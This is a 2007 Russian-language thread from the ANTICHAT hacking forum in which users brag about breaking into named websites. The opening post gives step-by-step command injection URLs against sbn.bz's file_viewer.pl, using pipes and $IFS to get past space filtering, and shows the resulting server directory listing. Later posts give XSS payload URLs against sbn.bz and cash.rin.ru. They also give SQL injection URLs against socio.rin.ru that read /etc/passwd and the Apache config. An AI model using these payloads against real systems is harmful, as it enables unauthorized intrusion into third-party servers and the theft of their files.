ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Уязвимость хостинга!-=sbn.bz=- |

07.05.2007, 15:21
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Уязвимость хостинга!-=sbn.bz=-
Недавно читал старый номер ][ , нашел статью FORBA о том как он ломал один хостинг. Вот и решил порыть тоже и нашел очень интересную дыру (cgi)в sbn.bz -тут можно зарегать бесплатный сайт(типа народа).
Для начала я зарегал себе акк - xxx.pbnet.ru
Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать.
Вот строка сост.браузера после создания
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_file
Затем ввел произвольных текст в файл blabla и сохранил.
После создания файла я решил просмотреть файл
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1
И вот заметил интересное
&file=hackme.txt&l=1
Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере
uid=515(www) gid=510(www) groups=510(www)
Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS.
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1
Но опять неудача  !
Решил вывести листинг файлов на сервере и тут все вышло
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|
А вот и файлы
Код:
total 336
drwxr-xr-x 15 root root 4096 Apr 14 18:26 .
drwxr-xr-x 9 root root 4096 Mar 22 2006 ..
-rw-r--r-- 1 root root 96 Dec 8 2005 .htaccess
drwxr-xr-x 4 root root 4096 Apr 29 17:11 Modules
drwxr-xr-x 4 root root 4096 May 16 2006 _admin
drwxr-xr-x 2 root root 4096 Jun 29 2006 admin_
-rwxrwxrwx 1 apacheuser apacheuser 4693 Oct 11 2006 auth.pl
drwxr-xr-x 5 root root 4096 Dec 22 2003 bn
-rwxr-xr-x 1 root root 413 Nov 14 01:33 cenzure_includes.pl
-rwxr-xr-x 1 apacheuser apacheuser 14111 Jun 20 2006 file_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 954 Jul 11 2005 full_img.pl
-rwxr-xr-x 1 apacheuser apacheuser 3819 May 2 2005 full_img.pl.old
-rwxr-xr-x 1 apacheuser apacheuser 2368 Jan 12 2004 hosting.pl
drwxr-xr-x 2 root root 4096 Jun 25 2004 ibill
-rwxr-xr-x 1 apacheuser apacheuser 9481 Jun 20 2006 img_viewer.pl
-rwxr-xr-x 1 apacheuser apacheuser 229 Jan 21 2004 link.pl
-rwxr-xr-x 1 apacheuser apacheuser 3702 Jan 23 2004 lost_pwd.pl
drwxr-xr-x 2 root root 4096 Oct 5 2006 mod
drwxr-xr-x 2 root root 4096 Sep 4 2006 ntps
-rwxr-xr-x 1 root root 7505 Jul 28 2006 ntps_adsfree.pl
drwxr-xr-x 2 root root 4096 Apr 29 00:47 parser
drwxr-xr-x 3 root root 4096 May 2 2005 paypal
-rwxr-xr-x 1 apacheuser apacheuser 3207 Dec 22 2003 redirect.pl
-rwxr-xr-x 1 apacheuser apacheuser 13254 Apr 22 2006 reg.pl
drwxr-xr-x 2 root root 4096 Dec 23 2003 rupay
-rwxr-xr-x 1 apacheuser apacheuser 2993 Jun 20 2006 save_template.pl
-rwxr-xr-x 1 apacheuser apacheuser 6259 Dec 22 2003 show.pl
-rwxr-xr-x 1 root root 4324 Sep 4 2006 sms_adsfree.pl
-rwxr-xr-x 1 root root 290 May 26 2006 unsubscribe.pl
-rwxr-xr-x 1 apacheuser apacheuser 6515 Jun 20 2006 upd.pl
drwxr-xr-x 2 root root 4096 Mar 22 2006 upload
drwxr-xr-x 2 root root 4096 Feb 15 19:17 view
-rwxr-xr-x 1 apacheuser apacheuser 12732 Apr 9 2006 view.pl
-rwxr-xr-x 1 apacheuser apacheuser 12347 Mar 9 2006 view.pl.bak
-rwxr-xr-x 1 apacheuser apacheuser 3866 Mar 22 2006 view_templates.pl
drwxr-xr-x 12 apacheuser apacheuser 4096 Jul 3 2005 webtools
Дальше выполнил pwd -- /var/www/html/sbn/cgi-bin
Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос.
; --режит. Ковырялся долго, но так и не залил не шелл не бекдор.
Нашел еще как можно выполнить команды которые не выполнялись выше например ls
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6TrU&file=/|ls|&dir=
К вашей сессии добавляем &file=/|ls|&dir= и все сохраняем, затем видим в директории файл с названием |ls| просмотрим его и видем листинг файлов!
А если выполнить тоже самое только ls$IFS-la|
без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла!
Код:
http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=
Просматривать файлы тоже можно!!!
Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста.
Спасибо за внимание. (с) fly 2007
|
|
|

07.05.2007, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме: 4778940
Репутация:
1257
|
|
гыгыгыгы.
там ещё и пасив xss
http://sbn.bz/cgi-bin/reg.pl?a=confirm_form&login="><script>alert('Hacke d by mr.The')</script>&email=admin@mail.ru&l=1&sel_host=sbn.bz
Последний раз редактировалось mr.The; 07.05.2007 в 19:27..
|
|
|

11.05.2007, 03:15
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
сЕЙЧАС КОПАЮ RIN.RU Все их проекты.
Вот на днях XSS ЕЩЕ НАШЕЛ
http://find.rin.ru/cgi-bin/charno/pipe.pl?text=pfff%3C/a%3E%3Cimg%20src=http://forum.antichat.ru/antichat/pic/logo.gif%3E
|
|
|

18.05.2007, 20:17
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Еще нашел один глюк на cash.rin.ru
ИдеМ регистрировать кошелек --- > http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid=
Затем ставим ---- ПРИМЕР (любое значение после reg.pl?l=1&sid=)-------http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid=HACKED
И вы увидите, что форма регистрации остается, а вот панель для ввода пароля меняется на панель якобы уже зареганного пользователя!
|
|
|

18.05.2007, 21:26
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме: 921520
Репутация:
572
|
|
Угу, но вроде явной пользы из этого не извлечешь.
|
|
|
Ca$hed ---- ОЧЕРЕДНАЯ БАГА В Rin СЕРВИСИ |

20.05.2007, 00:45
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Ca$hed ---- ОЧЕРЕДНАЯ БАГА В Rin СЕРВИСИ
Вот и XSS опять нашел в rin ---> cash.rin.ru
Пример1:
Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%20%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('Ca$hed%20by%20fLy')%3B%3C/ScRiPt%3E&a=send&l=1
Пример2:
Код:
http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%22+onmouseover=%22alert('Ca$hed%20by%20fLy')&a=send&l=1
А пишут , что CASH TRANSFER----надежный перевод ваших средств!!!
|
|
|

20.05.2007, 00:49
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
И вот еще SQL в ---socio.rin.ru
Код:
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,load_file('/etc/passwd')/*
Версия скулей
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,version()/*
Читаем конфиг
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,substring((load_file('/etc/httpd/conf/httpd.conf')),98,49)/*
Респект SQL-HACK за умные мысли и помощь в реализации небольшого сценария!
|
|
|

23.05.2007, 14:43
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
2 fly
там довольно-таки много читалок, скулей итп... про xss вообще промолчу )
__________________
|
|
|

23.05.2007, 14:54
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
Сообщение от +toxa+
2 fly
там довольно-таки много читалок, скулей итп... про xss вообще промолчу )
Ты это к чему!
|
|
|

23.05.2007, 15:18
|
|
Новичок
Регистрация: 23.05.2007
Сообщений: 19
Провел на форуме: 237993
Репутация:
7
|
|
fly - а как там файлы читать?
cat file
не катит чета)
Последний раз редактировалось wix; 23.05.2007 в 15:35..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|